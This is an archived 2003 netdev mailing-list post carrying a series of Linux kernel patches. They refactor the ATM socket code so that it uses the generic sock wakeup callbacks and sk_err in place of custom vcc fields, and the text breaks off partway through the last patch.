08:52:15 -0400 From: chas williams X-Spam-Score: () hits=0.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4047 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev this set does away with a few redundant bits in the struct atm_vcc, in particular .reply and .svc_callback. WAITING becomes a flag instead of overloading sk_err. it also changes the wake_up's to the appropriate sk event. [atm]: use sk_state_change() and eliminate vcc->callback() # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1360 -> 1.1361 # net/atm/svc.c 1.19 -> 1.20 # net/atm/signaling.c 1.15 -> 1.16 # include/linux/atmdev.h 1.19 -> 1.20 # net/atm/common.c 1.36 -> 1.37 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/20 chas@relax.cmf.nrl.navy.mil 1.1361 # use sk_state_change() and eliminate vcc->callback() # -------------------------------------------- # diff -Nru a/include/linux/atmdev.h b/include/linux/atmdev.h --- a/include/linux/atmdev.h Mon Jun 23 09:54:19 2003 +++ b/include/linux/atmdev.h Mon Jun 23 09:54:19 2003 @@ -297,7 +297,6 @@ short itf; /* interface number */ struct sockaddr_atmsvc local; struct sockaddr_atmsvc remote; - void (*callback)(struct atm_vcc *vcc); int reply; /* also used by ATMTCP */ /* Multipoint part ------------------------------------------------- */ struct atm_vcc *session; /* session VCC descriptor */ diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 23 09:54:19 2003 +++ b/net/atm/common.c Mon Jun 23 09:54:19 2003 @@ -215,6 +215,14 @@ kfree(sk->sk_protinfo); } + +static void vcc_def_wakeup(struct sock *sk) +{ + read_lock(&sk->sk_callback_lock); + if (sk->sk_sleep && waitqueue_active(sk->sk_sleep)) + wake_up(sk->sk_sleep); + read_unlock(&sk->sk_callback_lock); +} int vcc_create(struct socket *sock, int protocol, int family) { @@ -228,6 +236,7 @@ if (!sk) return -ENOMEM; sock_init_data(NULL, sk); + sk->sk_state_change = vcc_def_wakeup; vcc = atm_sk(sk) = kmalloc(sizeof(*vcc), GFP_KERNEL); if (!vcc) { @@ -238,7 +247,6 @@ memset(vcc, 0, sizeof(*vcc)); vcc->sk = sk; vcc->dev = NULL; - vcc->callback = NULL; memset(&vcc->local,0,sizeof(struct sockaddr_atmsvc)); memset(&vcc->remote,0,sizeof(struct sockaddr_atmsvc)); vcc->qos.txtp.max_sdu = 1 << 16; /* for meta VCs */ diff -Nru a/net/atm/signaling.c b/net/atm/signaling.c --- a/net/atm/signaling.c Mon Jun 23 09:54:19 2003 +++ b/net/atm/signaling.c Mon Jun 23 09:54:19 2003 @@ -137,11 +137,8 @@ } vcc->sk->sk_ack_backlog++; skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - if (vcc->callback) { - DPRINTK("waking vcc->sleep 0x%p\n", - &vcc->sleep); - vcc->callback(vcc); - } + DPRINTK("waking vcc->sleep 0x%p\n", &vcc->sleep); + vcc->sk->sk_state_change(vcc->sk); as_indicate_complete: release_sock(vcc->sk); return 0; @@ -159,7 +156,7 @@ (int) msg->type); return -EINVAL; } - if (vcc->callback) vcc->callback(vcc); + vcc->sk->sk_state_change(vcc->sk); dev_kfree_skb(skb); return 0; } diff -Nru a/net/atm/svc.c b/net/atm/svc.c --- a/net/atm/svc.c Mon Jun 23 09:54:19 2003 +++ b/net/atm/svc.c Mon Jun 23 09:54:19 2003 @@ -43,14 +43,6 @@ */ -void svc_callback(struct atm_vcc *vcc) -{ - wake_up(&vcc->sleep); -} - - - - static int svc_shutdown(struct socket *sock,int how) { return 0; @@ -547,7 +539,6 @@ sock->ops = &svc_proto_ops; error = vcc_create(sock, protocol, AF_ATMSVC); if (error) return error; - ATM_SD(sock)->callback = svc_callback; ATM_SD(sock)->local.sas_family = AF_ATMSVC; ATM_SD(sock)->remote.sas_family = AF_ATMSVC; return 0; [atm]: eliminate vcc->sleep in favor of sk->sk_sleep # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1361 -> 1.1362 # net/atm/lec.c 1.30 -> 1.31 # net/atm/svc.c 1.20 -> 1.21 # drivers/atm/atmtcp.c 1.11 -> 1.12 # net/atm/signaling.c 1.16 -> 1.17 # net/atm/mpc.c 1.21 -> 1.22 # include/linux/atmdev.h 1.20 -> 1.21 # net/atm/raw.c 1.4 -> 1.5 # net/atm/clip.c 1.18 -> 1.19 # net/atm/common.c 1.37 -> 1.38 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/23 chas@relax.cmf.nrl.navy.mil 1.1362 # eliminate vcc->sleep # -------------------------------------------- # diff -Nru a/drivers/atm/atmtcp.c b/drivers/atm/atmtcp.c --- a/drivers/atm/atmtcp.c Mon Jun 23 10:58:07 2003 +++ b/drivers/atm/atmtcp.c Mon Jun 23 10:58:07 2003 @@ -66,7 +66,7 @@ *(struct atm_vcc **) &new_msg->vcc = vcc; old_test = test_bit(flag,&vcc->flags); out_vcc->push(out_vcc,skb); - add_wait_queue(&vcc->sleep,&wait); + add_wait_queue(vcc->sk->sk_sleep, &wait); while (test_bit(flag,&vcc->flags) == old_test) { mb(); out_vcc = PRIV(vcc->dev) ? PRIV(vcc->dev)->vcc : NULL; @@ -78,7 +78,7 @@ schedule(); } current->state = TASK_RUNNING; - remove_wait_queue(&vcc->sleep,&wait); + remove_wait_queue(vcc->sk->sk_sleep, &wait); return error; } @@ -103,7 +103,7 @@ msg->type); return -EINVAL; } - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); return 0; } @@ -257,7 +257,7 @@ walk = atm_sk(s); if (walk->dev != atmtcp_dev) continue; - wake_up(&walk->sleep); + wake_up(walk->sk->sk_sleep); } read_unlock(&vcc_sklist_lock); } diff -Nru a/include/linux/atmdev.h b/include/linux/atmdev.h --- a/include/linux/atmdev.h Mon Jun 23 10:58:07 2003 +++ b/include/linux/atmdev.h Mon Jun 23 10:58:07 2003 @@ -291,7 +291,6 @@ void *dev_data; /* per-device data */ void *proto_data; /* per-protocol data */ struct k_atm_aal_stats *stats; /* pointer to AAL stats group */ - wait_queue_head_t sleep; /* if socket is busy */ struct sock *sk; /* socket backpointer */ /* SVC part --- may move later ------------------------------------- */ short itf; /* interface number */ diff -Nru a/net/atm/clip.c b/net/atm/clip.c --- a/net/atm/clip.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/clip.c Mon Jun 23 10:58:07 2003 @@ -67,7 +67,7 @@ ctrl->ip = ip; atm_force_charge(atmarpd,skb->truesize); skb_queue_tail(&atmarpd->sk->sk_receive_queue, skb); - wake_up(&atmarpd->sleep); + wake_up(atmarpd->sk->sk_sleep); return 0; } diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/common.c Mon Jun 23 10:58:07 2003 @@ -235,7 +235,7 @@ sk = sk_alloc(family, GFP_KERNEL, 1, NULL); if (!sk) return -ENOMEM; - sock_init_data(NULL, sk); + sock_init_data(sock, sk); sk->sk_state_change = vcc_def_wakeup; vcc = atm_sk(sk) = kmalloc(sizeof(*vcc), GFP_KERNEL); @@ -257,8 +257,6 @@ vcc->push_oam = NULL; vcc->vpi = vcc->vci = 0; /* no VCI/VPI yet */ vcc->atm_options = vcc->aal_options = 0; - init_waitqueue_head(&vcc->sleep); - sk->sk_sleep = &vcc->sleep; sk->sk_destruct = vcc_sock_destruct; sock->sk = sk; return 0; @@ -310,7 +308,7 @@ set_bit(ATM_VF_CLOSE, &vcc->flags); vcc->reply = reply; vcc->sk->sk_err = -reply; - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); } @@ -557,7 +555,7 @@ } /* verify_area is done by net/socket.c */ eff = (size+3) & ~3; /* align to word boundary */ - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); error = 0; while (!(skb = alloc_tx(vcc,eff))) { if (m->msg_flags & MSG_DONTWAIT) { @@ -578,9 +576,9 @@ error = -EPIPE; break; } - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); } - finish_wait(&vcc->sleep, &wait); + finish_wait(sk->sk_sleep, &wait); if (error) goto out; skb->dev = NULL; /* for paths shared with net_device interfaces */ @@ -605,7 +603,7 @@ unsigned int mask; vcc = ATM_SD(sock); - poll_wait(file,&vcc->sleep,wait); + poll_wait(file, vcc->sk->sk_sleep, wait); mask = 0; if (skb_peek(&vcc->sk->sk_receive_queue)) mask |= POLLIN | POLLRDNORM; diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/lec.c Mon Jun 23 10:58:07 2003 @@ -134,7 +134,7 @@ priv = (struct lec_priv *)dev->priv; atm_force_charge(priv->lecd, skb2->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb2); - wake_up(&priv->lecd->sleep); + wake_up(priv->lecd->sk->sk_sleep); } return; @@ -513,7 +513,7 @@ memcpy(skb2->data, mesg, sizeof(struct atmlec_msg)); atm_force_charge(priv->lecd, skb2->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb2); - wake_up(&priv->lecd->sleep); + wake_up(priv->lecd->sk->sk_sleep); } if (f != NULL) br_fdb_put_hook(f); #endif /* defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) */ @@ -598,13 +598,13 @@ atm_force_charge(priv->lecd, skb->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb); - wake_up(&priv->lecd->sleep); + wake_up(priv->lecd->sk->sk_sleep); if (data != NULL) { DPRINTK("lec: about to send %d bytes of data\n", data->len); atm_force_charge(priv->lecd, data->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, data); - wake_up(&priv->lecd->sleep); + wake_up(priv->lecd->sk->sk_sleep); } return 0; @@ -686,7 +686,7 @@ if (memcmp(skb->data, lec_ctrl_magic, 4) ==0) { /* Control frame, to daemon*/ DPRINTK("%s: To daemon\n",dev->name); skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); } else { /* Data frame, queue to protocol handlers */ unsigned char *dst; diff -Nru a/net/atm/mpc.c b/net/atm/mpc.c --- a/net/atm/mpc.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/mpc.c Mon Jun 23 10:58:07 2003 @@ -669,7 +669,7 @@ dprintk("mpoa: (%s) mpc_push: control packet arrived\n", dev->name); /* Pass control packets to daemon */ skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); return; } @@ -947,7 +947,7 @@ memcpy(skb->data, mesg, sizeof(struct k_message)); atm_force_charge(mpc->mpoad_vcc, skb->truesize); skb_queue_tail(&mpc->mpoad_vcc->sk->sk_receive_queue, skb); - wake_up(&mpc->mpoad_vcc->sleep); + wake_up(mpc->mpoad_vcc->sk->sk_sleep); return 0; } @@ -1226,7 +1226,7 @@ atm_force_charge(vcc, skb->truesize); skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); dprintk("mpoa: purge_egress_shortcut: exiting:\n"); return; diff -Nru a/net/atm/raw.c b/net/atm/raw.c --- a/net/atm/raw.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/raw.c Mon Jun 23 10:58:07 2003 @@ -29,7 +29,7 @@ { if (skb) { skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); } } @@ -40,7 +40,7 @@ skb->truesize); atomic_sub(skb->truesize, &vcc->sk->sk_wmem_alloc); dev_kfree_skb_any(skb); - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); } diff -Nru a/net/atm/signaling.c b/net/atm/signaling.c --- a/net/atm/signaling.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/signaling.c Mon Jun 23 10:58:07 2003 @@ -61,7 +61,7 @@ #endif atm_force_charge(sigd,skb->truesize); skb_queue_tail(&sigd->sk->sk_receive_queue,skb); - wake_up(&sigd->sleep); + wake_up(sigd->sk->sk_sleep); } @@ -137,7 +137,7 @@ } vcc->sk->sk_ack_backlog++; skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - DPRINTK("waking vcc->sleep 0x%p\n", &vcc->sleep); + DPRINTK("waking vcc->sk->sk_sleep 0x%p\n", vcc->sk->sk_sleep); vcc->sk->sk_state_change(vcc->sk); as_indicate_complete: release_sock(vcc->sk); @@ -204,7 +204,7 @@ set_bit(ATM_VF_RELEASED,&vcc->flags); vcc->reply = -EUNATCH; vcc->sk->sk_err = EUNATCH; - wake_up(&vcc->sleep); + wake_up(vcc->sk->sk_sleep); } } diff -Nru a/net/atm/svc.c b/net/atm/svc.c --- a/net/atm/svc.c Mon Jun 23 10:58:07 2003 +++ b/net/atm/svc.c Mon Jun 23 10:58:07 2003 @@ -56,13 +56,13 @@ DPRINTK("svc_disconnect %p\n",vcc); if (test_bit(ATM_VF_REGIS,&vcc->flags)) { - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(vcc,as_close,NULL,NULL,NULL); while (!test_bit(ATM_VF_RELEASED,&vcc->flags) && sigd) { schedule(); - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } - finish_wait(&vcc->sleep, &wait); + finish_wait(vcc->sk->sk_sleep, &wait); } /* beware - socket is still in use by atmsigd until the last as_indicate has been answered */ @@ -138,13 +138,13 @@ } vcc->local = *addr; vcc->reply = WAITING; - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(vcc,as_bind,NULL,NULL,&vcc->local); while (vcc->reply == WAITING && sigd) { schedule(); - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } - finish_wait(&vcc->sleep, &wait); + finish_wait(sk->sk_sleep, &wait); clear_bit(ATM_VF_REGIS,&vcc->flags); /* doesn't count */ if (!sigd) { error = -EUNATCH; @@ -219,10 +219,10 @@ } vcc->remote = *addr; vcc->reply = WAITING; - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); sigd_enq(vcc,as_connect,NULL,NULL,&vcc->remote); if (flags & O_NONBLOCK) { - finish_wait(&vcc->sleep, &wait); + finish_wait(sk->sk_sleep, &wait); sock->state = SS_CONNECTING; error = -EINPROGRESS; goto out; @@ -231,7 +231,7 @@ while (vcc->reply == WAITING && sigd) { schedule(); if (!signal_pending(current)) { - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); continue; } DPRINTK("*ABORT*\n"); @@ -249,13 +249,13 @@ */ sigd_enq(vcc,as_close,NULL,NULL,NULL); while (vcc->reply == WAITING && sigd) { - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); schedule(); } if (!vcc->reply) while (!test_bit(ATM_VF_RELEASED,&vcc->flags) && sigd) { - prepare_to_wait(&vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); schedule(); } clear_bit(ATM_VF_REGIS,&vcc->flags); @@ -265,7 +265,7 @@ error = -EINTR; break; } - finish_wait(&vcc->sleep, &wait); + finish_wait(sk->sk_sleep, &wait); if (error) goto out; if (!sigd) { @@ -312,13 +312,13 @@ goto out; } vcc->reply = WAITING; - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(vcc,as_listen,NULL,NULL,&vcc->local); while (vcc->reply == WAITING && sigd) { schedule(); - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } - finish_wait(&vcc->sleep, &wait); + finish_wait(sk->sk_sleep, &wait); if (!sigd) { error = -EUNATCH; goto out; @@ -354,7 +354,7 @@ while (1) { DEFINE_WAIT(wait); - prepare_to_wait(&old_vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(old_vcc->sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); while (!(skb = skb_dequeue(&old_vcc->sk->sk_receive_queue)) && sigd) { if (test_bit(ATM_VF_RELEASED,&old_vcc->flags)) break; @@ -373,9 +373,9 @@ error = -ERESTARTSYS; break; } - prepare_to_wait(&old_vcc->sleep, &wait, TASK_INTERRUPTIBLE); + prepare_to_wait(old_vcc->sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); } - finish_wait(&old_vcc->sleep, &wait); + finish_wait(old_vcc->sk->sk_sleep, &wait); if (error) goto out; if (!skb) { @@ -400,15 +400,15 @@ } /* wait should be short, so we ignore the non-blocking flag */ new_vcc->reply = WAITING; - prepare_to_wait(&new_vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(new_vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(new_vcc,as_accept,old_vcc,NULL,NULL); while (new_vcc->reply == WAITING && sigd) { release_sock(sk); schedule(); lock_sock(sk); - prepare_to_wait(&new_vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(new_vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } - finish_wait(&new_vcc->sleep, &wait); + finish_wait(new_vcc->sk->sk_sleep, &wait); if (!sigd) { error = -EUNATCH; goto out; @@ -444,14 +444,14 @@ DEFINE_WAIT(wait); vcc->reply = WAITING; - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq2(vcc,as_modify,NULL,NULL,&vcc->local,qos,0); while (vcc->reply == WAITING && !test_bit(ATM_VF_RELEASED,&vcc->flags) && sigd) { schedule(); - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } - finish_wait(&vcc->sleep, &wait); + finish_wait(vcc->sk->sk_sleep, &wait); if (!sigd) return -EUNATCH; return vcc->reply; } [atm]: use sk_data_ready and sk_change_state instead of wake_up # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1365 -> 1.1366 # net/atm/lec.c 1.31 -> 1.32 # net/atm/signaling.c 1.18 -> 1.19 # net/atm/mpc.c 1.22 -> 1.23 # net/atm/raw.c 1.5 -> 1.6 # net/atm/clip.c 1.19 -> 1.20 # net/atm/common.c 1.40 -> 1.41 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/23 chas@relax.cmf.nrl.navy.mil 1.1366 # use sk_data_ready and sk_change_state instead of wake_up # -------------------------------------------- # diff -Nru a/net/atm/clip.c b/net/atm/clip.c --- a/net/atm/clip.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/clip.c Mon Jun 23 10:57:48 2003 @@ -67,7 +67,7 @@ ctrl->ip = ip; atm_force_charge(atmarpd,skb->truesize); skb_queue_tail(&atmarpd->sk->sk_receive_queue, skb); - wake_up(atmarpd->sk->sk_sleep); + atmarpd->sk->sk_data_ready(atmarpd->sk, skb->len); return 0; } diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/common.c Mon Jun 23 10:57:48 2003 @@ -328,7 +328,7 @@ set_bit(ATM_VF_CLOSE, &vcc->flags); vcc->reply = reply; vcc->sk->sk_err = -reply; - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_state_change(vcc->sk); } diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/lec.c Mon Jun 23 10:57:48 2003 @@ -134,7 +134,7 @@ priv = (struct lec_priv *)dev->priv; atm_force_charge(priv->lecd, skb2->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb2); - wake_up(priv->lecd->sk->sk_sleep); + priv->lecd->sk->sk_data_ready(priv->lecd->sk, skb2->len); } return; @@ -513,7 +513,7 @@ memcpy(skb2->data, mesg, sizeof(struct atmlec_msg)); atm_force_charge(priv->lecd, skb2->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb2); - wake_up(priv->lecd->sk->sk_sleep); + priv->lecd->sk->sk_data_ready(priv->lecd->sk, skb2->len); } if (f != NULL) br_fdb_put_hook(f); #endif /* defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) */ @@ -598,13 +598,13 @@ atm_force_charge(priv->lecd, skb->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb); - wake_up(priv->lecd->sk->sk_sleep); + priv->lecd->sk->sk_data_ready(priv->lecd->sk, skb->len); if (data != NULL) { DPRINTK("lec: about to send %d bytes of data\n", data->len); atm_force_charge(priv->lecd, data->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, data); - wake_up(priv->lecd->sk->sk_sleep); + priv->lecd->sk->sk_data_ready(priv->lecd->sk, skb->len); } return 0; @@ -686,7 +686,7 @@ if (memcmp(skb->data, lec_ctrl_magic, 4) ==0) { /* Control frame, to daemon*/ DPRINTK("%s: To daemon\n",dev->name); skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_data_ready(vcc->sk, skb->len); } else { /* Data frame, queue to protocol handlers */ unsigned char *dst; diff -Nru a/net/atm/mpc.c b/net/atm/mpc.c --- a/net/atm/mpc.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/mpc.c Mon Jun 23 10:57:48 2003 @@ -669,7 +669,7 @@ dprintk("mpoa: (%s) mpc_push: control packet arrived\n", dev->name); /* Pass control packets to daemon */ skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_data_ready(vcc->sk, skb->len); return; } @@ -947,7 +947,7 @@ memcpy(skb->data, mesg, sizeof(struct k_message)); atm_force_charge(mpc->mpoad_vcc, skb->truesize); skb_queue_tail(&mpc->mpoad_vcc->sk->sk_receive_queue, skb); - wake_up(mpc->mpoad_vcc->sk->sk_sleep); + mpc->mpoad_vcc->sk->sk_data_ready(mpc->mpoad_vcc->sk, skb->len); return 0; } @@ -1226,7 +1226,7 @@ atm_force_charge(vcc, skb->truesize); skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_data_ready(vcc->sk, skb->len); dprintk("mpoa: purge_egress_shortcut: exiting:\n"); return; diff -Nru a/net/atm/raw.c b/net/atm/raw.c --- a/net/atm/raw.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/raw.c Mon Jun 23 10:57:48 2003 @@ -29,7 +29,7 @@ { if (skb) { skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_data_ready(vcc->sk, skb->len); } } diff -Nru a/net/atm/signaling.c b/net/atm/signaling.c --- a/net/atm/signaling.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/signaling.c Mon Jun 23 10:57:48 2003 @@ -63,7 +63,7 @@ #endif atm_force_charge(sigd,skb->truesize); skb_queue_tail(&sigd->sk->sk_receive_queue,skb); - wake_up(sigd->sk->sk_sleep); + sigd->sk->sk_data_ready(sigd->sk, skb->len); } @@ -206,7 +206,7 @@ set_bit(ATM_VF_RELEASED,&vcc->flags); vcc->reply = -EUNATCH; vcc->sk->sk_err = EUNATCH; - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_state_change(vcc->sk); } } [atm]: replace vcc->reply with sk->sk_err; implement sk_write_space # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1310.51.8 -> 1.1310.51.9 # net/atm/signaling.h 1.1 -> 1.2 # net/atm/proc.c 1.21 -> 1.22 # net/atm/pvc.c 1.17 -> 1.18 # drivers/atm/atmtcp.c 1.12 -> 1.13 # net/atm/svc.c 1.21 -> 1.22 # net/atm/common.h 1.15 -> 1.16 # net/atm/signaling.c 1.19 -> 1.20 # include/linux/atmdev.h 1.21 -> 1.22 # net/atm/raw.c 1.6 -> 1.7 # net/atm/common.c 1.41 -> 1.42 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/05 chas@relax.cmf.nrl.navy.mil 1.1310.51.9 # replace vcc->reply with sk->sk_err; making WAITING a ATM_VF flag # -------------------------------------------- # diff -Nru a/drivers/atm/atmtcp.c b/drivers/atm/atmtcp.c --- a/drivers/atm/atmtcp.c Mon Jul 14 22:19:44 2003 +++ b/drivers/atm/atmtcp.c Mon Jul 14 22:19:44 2003 @@ -90,7 +90,7 @@ vcc->vpi = msg->addr.sap_addr.vpi; vcc->vci = msg->addr.sap_addr.vci; vcc->qos = msg->qos; - vcc->reply = msg->result; + vcc->sk->sk_err = -msg->result; switch (msg->type) { case ATMTCP_CTRL_OPEN: change_bit(ATM_VF_READY,&vcc->flags); @@ -134,7 +134,7 @@ clear_bit(ATM_VF_READY,&vcc->flags); /* just in case ... */ error = atmtcp_send_control(vcc,ATMTCP_CTRL_OPEN,&msg,ATM_VF_READY); if (error) return error; - return vcc->reply; + return -vcc->sk->sk_err; } diff -Nru a/include/linux/atmdev.h b/include/linux/atmdev.h --- a/include/linux/atmdev.h Mon Jul 14 22:19:44 2003 +++ b/include/linux/atmdev.h Mon Jul 14 22:19:44 2003 @@ -252,6 +252,7 @@ ATM_VF_SESSION, /* VCC is p2mp session control descriptor */ ATM_VF_HASSAP, /* SAP has been set */ ATM_VF_CLOSE, /* asynchronous close - treat like VF_RELEASED*/ + ATM_VF_WAITING, /* waiting for reply from sigd */ }; @@ -296,7 +297,6 @@ short itf; /* interface number */ struct sockaddr_atmsvc local; struct sockaddr_atmsvc remote; - int reply; /* also used by ATMTCP */ /* Multipoint part ------------------------------------------------- */ struct atm_vcc *session; /* session VCC descriptor */ /* Other stuff ----------------------------------------------------- */ diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/common.c Mon Jul 14 22:19:44 2003 @@ -243,6 +243,29 @@ wake_up(sk->sk_sleep); read_unlock(&sk->sk_callback_lock); } + +static inline int vcc_writable(struct sock *sk) +{ + struct atm_vcc *vcc = atm_sk(sk); + + return (vcc->qos.txtp.max_sdu + + atomic_read(&sk->sk_wmem_alloc)) <= sk->sk_sndbuf; +} + +static void vcc_write_space(struct sock *sk) +{ + read_lock(&sk->sk_callback_lock); + + if (vcc_writable(sk)) { + if (sk->sk_sleep && waitqueue_active(sk->sk_sleep)) + wake_up_interruptible(sk->sk_sleep); + + sk_wake_async(sk, 2, POLL_OUT); + } + + read_unlock(&sk->sk_callback_lock); +} + int vcc_create(struct socket *sock, int protocol, int family) { @@ -257,6 +280,7 @@ return -ENOMEM; sock_init_data(sock, sk); sk->sk_state_change = vcc_def_wakeup; + sk->sk_write_space = vcc_write_space; vcc = atm_sk(sk) = kmalloc(sizeof(*vcc), GFP_KERNEL); if (!vcc) { @@ -326,8 +350,8 @@ void vcc_release_async(struct atm_vcc *vcc, int reply) { set_bit(ATM_VF_CLOSE, &vcc->flags); - vcc->reply = reply; vcc->sk->sk_err = -reply; + clear_bit(ATM_VF_WAITING, &vcc->flags); vcc->sk->sk_state_change(vcc->sk); } @@ -501,7 +525,7 @@ vcc = ATM_SD(sock); if (test_bit(ATM_VF_RELEASED,&vcc->flags) || test_bit(ATM_VF_CLOSE,&vcc->flags)) - return vcc->reply; + return -sk->sk_err; if (!test_bit(ATM_VF_READY, &vcc->flags)) return 0; @@ -558,7 +582,7 @@ vcc = ATM_SD(sock); if (test_bit(ATM_VF_RELEASED, &vcc->flags) || test_bit(ATM_VF_CLOSE, &vcc->flags)) { - error = vcc->reply; + error = -sk->sk_err; goto out; } if (!test_bit(ATM_VF_READY, &vcc->flags)) { @@ -589,7 +613,7 @@ } if (test_bit(ATM_VF_RELEASED,&vcc->flags) || test_bit(ATM_VF_CLOSE,&vcc->flags)) { - error = vcc->reply; + error = -sk->sk_err; break; } if (!test_bit(ATM_VF_READY,&vcc->flags)) { @@ -617,29 +641,38 @@ } -unsigned int atm_poll(struct file *file,struct socket *sock,poll_table *wait) +unsigned int vcc_poll(struct file *file, struct socket *sock, 